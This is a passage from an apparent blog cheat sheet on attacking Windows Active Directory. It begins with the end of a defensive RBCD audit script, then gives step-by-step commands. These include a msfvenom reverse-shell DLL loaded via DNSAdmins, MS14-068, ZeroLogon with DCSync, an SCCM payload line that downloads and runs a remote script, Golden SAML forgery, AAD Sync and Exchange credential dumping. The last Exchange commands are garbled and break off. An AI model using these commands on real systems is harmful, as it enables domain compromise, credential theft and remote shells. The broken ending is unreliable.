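                Finding   = 'RBCD'
                Computer  = $computer.Name
                Principal = $ace.IdentityReference.Value
                Detail    = "$($ace.AccessControlType): $($ace.ActiveDirectoryRights)"
            }
        }
    }

    # 2. Computer objects created through the quota: AD stamps mS-DS-CreatorSID only
    #    when the creator was not an administrator, so a populated value means a
    #    non-privileged account added this machine (as New-MachineAccount does).
    $quotaHosts = Get-ADComputer -LDAPFilter '(mS-DS-CreatorSID=*)' -SearchBase $SearchBase `
        -Properties 'mS-DS-CreatorSID', whenCreated
    foreach ($computer in $quotaHosts) {
        $raw = $computer.'mS-DS-CreatorSID'
        # The attribute is an octet string; build a SID from the bytes unless already converted
        $sid = if ($raw -is [System.Security.Principal.SecurityIdentifier]) { $raw }
               else { New-Object System.Security.Principal.SecurityIdentifier -ArgumentList @([byte[]]$raw, 0) }
        try   { $creator = $sid.Translate([System.Security.Principal.NTAccount]).Value }
        catch { $creator = $sid.Value }   # creator account deleted: keep the raw SID
        [pscustomobject]@{
            Finding   = 'CreatedViaQuota'
            Computer  = $computer.Name
            Principal = $creator
            Detail    = "created $($computer.whenCreated)"
        }
    }
}

# An RBCD entry whose Principal is a CreatedViaQuota machine is exactly the chain
# described in the sections above and should be investigated and removed.
Get-RbcdAudit | Sort-Object Finding, Computer | Format-Table -AutoSize
```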

DNSAdmins Group to DC

- This attack works only if you are part of the default DNSAdmins Group.

The DLL entry is stored in the registry value ServerLevelPluginDll under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters\; delete the entry once you are done with the attack

#Create a Reverse shell DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.30 LPORT=443 -f dll -o rev.dll

#Start SMB Server
sudo smbserver.py shell .

#on Target who is a part of DNSAdmins Group
dnscmd.exe /config /serverlevelplugindll \\10.10.10.10\shell\rev.dll
or

dnscmd.exe dc.steins.local /config /serverlevelplugindll \\10.10.10.10\shell\rev.dll

#Restart DNS service

sc.exe \\HOSTNAME stop dns
sc.exe \\HOSTNAME start dns

#Start a netcat listener
nc -nvlp 443

Exploiting Knock & Pass Kerberos MS14-068

apt-get install krb5-user cifs-utils rdate

#add DCIP to /etc/hosts
10.10.10.10 dc.steins.local dc

# Add the target as a nameserver in /etc/resolv.conf

nameserver 10.10.10.10

#take a backup of /etc/krb5.conf and replace it with the below - realm names are case sensitive
[libdefaults]
default_realm = HTB.LOCAL

[realms]
HTB.LOCAL = {
kdc = mantis.htb.local:88
admin_server = mantis.htb.local
default_domain = HTB.LOCAL
}
[domain_realm]
.domain.internal = HTB.LOCAL
domain.internal = HTB.LOCAL

#Generate a kerberos ticket
kinit james

#View the ticket

klist

#Lets generate a Golden Ticket

goldenPac.py -dc-ip 10.10.10.10 -target-ip 10.10.10.10 steins.local/[email protected]

Abusing ZeroLogon CVE-2020-1472

mimikatz.exe

#check whether the DC is vulnerable
lsadump::zerologon /target:dc.steins.local /account:dc$

#Exploiting the vuln; the DC machine account password is set to empty.
lsadump::zerologon /target:dc.steins.local /account:dc$ /exploit

#we can now run a DCSync attack to get the hashes; with the krbtgt hash, golden ticket and silver ticket attacks become possible
lsadump::dcsync /dc:dc.steins.local /authuser:dc$ /authdomain:anything.local /authpassword:"" /authntlm /user:krbtgt


Exploiting SCCM Server  

Download and Import PowerSCCM.ps1 and add the below line to use custom payload without any encoding
$LaunchCMD = "powershell.exe iex(invoke-webrequest('http://10.10.10.10/rev.ps1') -UseBasicParsing)"


#Find SCCM Sitecode and Server Hostname
Find-LocalSccmInfo

#Connect to SCCM Server, creating a session
New-SccmSession -ComputerName SCCM.steins.local -SiteCode BA1 -ConnectionType WMI

#View connected SCCM Agents

Get-SCCMSession | Get-SccmComputer

#List All Applications
Get-SCCMSession | Get-SCCMApplication

#If you have multiple targets, create a collection and push the payload/exploit to the target at once

Get-SCCMSession | New-SCCMCollection -CollectionName "targets" -CollectionType "Device"

#View All collections
Get-SCCMSession | Get-SCCMCollection | Select Name

#Add a server to our new collection

Get-SCCMSession |Add-SccmDeviceToCollection -ComputerNameToAdd "Vuln_server1" -CollectionName "targets"

#Create a new application with any payload as our manual payload will execute eitherway.
 Get-SCCMSession | New-SccmApplication -ApplicationName "shit" -Powershellunicodeb64 "Any_BASE64_Content"

#Create a Deployment and add it to our collection
Get-SCCMSession | New-SCCMApplicationDeployment -ApplicationName "shit" -AssignmentName "update" -CollectionName "targets"

#Force the clients to take the package
Get-SCCMSession |Invoke-SCCMDeviceCheckin -CollectionName "targets"

Exploiting ADFS_Server - Golden SAML Attack

#If you have ADFS server credentials, follow the steps below. Get ADFSDump from its repository

#Collect all the required info from ADFSDump - certs, tokens,endpoint details

copy the encrypted token-signing key, decode it from base64 and save it as the blob (example below)

Save the private key and decode it from hex
cat key
D4YT5FD5GSFD51SFGFDH45DE4GES5GSDG5DS6GS65FD1GDFG

cat key | xxd -r -p > key.bin


Download ADFSpoof and run it as below


#Generate a SAML authentication token and present it to the endpoint application.
python3 ADFSpoof.py -b blob key.bin -s adfs.steins.local saml2 --endpoint 'https://endpoint.steins.local/SamlResponseServlet' --nameidformat 'urn:oasis:names:tc:SAML:2.0:nameid-format:transient' --nameid '0x0security\administrator' --rpidentifier 'ME_2484c52-45g3-8541-df24-t543dsf18' --assertions '0x0security\administrator' 

Exploiting Azure AD Sync Server

#Check whether the service is running; if it is turned off, start it as described in the linked tutorial

#Use this script to dump msol hashes which has Domain replicate permissions - azuread_decrypt_msol_v2.ps1

#Copy the credentials, and using those creds - run DCSync on the domain controller

#login to the ADSync machine via RDP and copy mimikatz on the machine

# Shift+right click --> Run as another user --> use MSOL_2433243 creds

# Run below command to run dcsync attack, which dumps all hashes
lsadump::dcsync /domain:orbitfish.local /all /csv 

Abusing Exchange Servers

#Abusing Exchange if you are part of the Organization Management group; the bug was fixed in 2019 c2

#Organization Management group --> has access to the Exchange server --> the Exchange server is a member of Exchange Trusted Subsystem --> Exchange Trusted Subsystem is a member of Exchange Windows Permissions --> which holds WriteDACL on the root domain object, leading to forest compromise.


#Login to exchange server --> bypass AMSI
#upload mimikatz to the target machine
Invoke-Command -FilePath .\Invoke-Mimikatz.ps1 -Session $ExchangeServer
Enter-PSSession $ExchangeServer

#Download all the keys/creds from exchange server
Invoke-Mimikatz -Command '"sekurlsa::ekeys"'

#abusing exchange to gain DCSync
Invoke-Mimikatz -Command '"sekurlsaL:LInvoke
Invoke-Mimikatz -Command '"sekurlsa::pth /user:ExchangeServer$ domain:St


This post first appeared on Hacking Dream, please read the originial post: here
